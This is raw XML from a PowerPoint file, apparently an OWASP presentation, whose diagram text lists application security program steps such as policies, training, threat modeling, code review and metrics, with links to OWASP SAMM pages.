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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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29"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId30"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="293" r:id="rId2"/>
    <p:sldId id="296" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="318" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="301" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="304" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="315" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="310" r:id="rId17"/>
    <p:sldId id="306" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="302" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="322" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9144000" type="letter"/>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88" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1440" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="2880" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3600" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="3025">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="230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rsten" initials="T" lastIdx="96" clrIdx="0"/>
  <p:cmAuthor id="1" name="DorisTorsten" initials="D" lastIdx="0" clrIdx="1"/>
  <p:cmAuthor id="2" name="Andrew van der Stock" initials="AS" lastIdx="6" clrIdx="2">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="office@enil.us" initials="o" lastIdx="1" clrIdx="3">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Andrew van der Stock" initials="AvdS" lastIdx="1"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B93A32"/>
    <a:srgbClr val="672E3B"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="B3D6AC"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="4A1647"/>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C8EBCD-7145-40A6-AFFE-0ECEDBF7A988}" v="16" dt="2017-10-20T19:32:42.460"/>
    <p1510:client id="{45007F43-A5A5-436D-8489-898C5F0391BC}" v="993" dt="2017-10-20T00:32:30.533"/>
    <p1510:client id="{48C61886-BF69-48E8-B967-C32013B21537}" v="4523" dt="2017-10-19T22:21:38.286"/>
    <p1510:client id="{3EDA3077-C2A0-42BE-A221-59B7431E90EF}" v="533" dt="2017-10-20T17:17:50.1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26" autoAdjust="0"/>
    <p:restoredTop sz="94383" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="870" y="132"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="36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1" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="-2802" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3025"/>
        <p:guide pos="230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hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1"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www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="Externa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en-US" sz="1050" b="1"/>
            <a:t>Get Started</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Document all applications and associated data assets </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" noProof="0" dirty="0"/>
            <a:t>in a Configuration Management Database (CMDB).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>Risk Based Portfolio Approach</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F576BD5F-AD4E-429F-935A-1A67C630AE0F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>protection needs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t> from a business perspective.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> This should be driven in part by privacy laws and other regulations relevant to the data asset being protected. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1"/>
            <a:t>Enable with a Strong Foundation</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91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> that provide an application security baseline for all</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> development teams to adhere to.</a:t>
          </a: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FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>common set of reusable security controls </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>that complement these policies and standards and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024BBBE2-0706-4354-8AB0-3262009E8862}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> that is required and targeted to different</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" type="parTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C468EA37-5762-4D06-A4F9-E930ECF24341}" type="sibTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1"/>
            <a:t>Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> activities into existing development and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>threat modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, secure design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, secure coding &amp; </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>code review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>penetration testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>, and remediation.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> to be</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> successful.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" type="parTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}" type="sibTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1"/>
            <a:t>Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis</a:t>
          </a:r>
          <a:br>
